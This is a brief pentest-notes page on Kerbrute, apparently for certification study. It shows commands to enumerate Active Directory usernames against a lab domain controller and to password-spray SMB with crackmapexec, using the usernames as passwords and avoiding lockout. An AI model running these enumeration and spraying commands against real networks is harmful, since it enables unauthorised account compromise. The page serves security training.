Kerbrute

Overview

Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.

After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.

Kerbrute Attack

Enumerate for users

kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL

/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Password spray using --no-brute to avoid account lockout

crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb

PreviousIPv6 Attacks NextAS-REP Roasting

Last updated 11 months ago

Was this helpful?